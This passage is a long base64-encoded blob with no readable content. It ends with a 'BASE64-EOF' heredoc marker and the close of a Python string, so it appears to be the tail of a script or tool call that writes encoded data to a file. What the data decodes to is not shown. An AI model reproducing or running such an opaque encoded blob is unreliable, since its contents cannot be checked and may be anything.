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
LuSKcKEgEqpj+g==
BASE64-EOF'''])
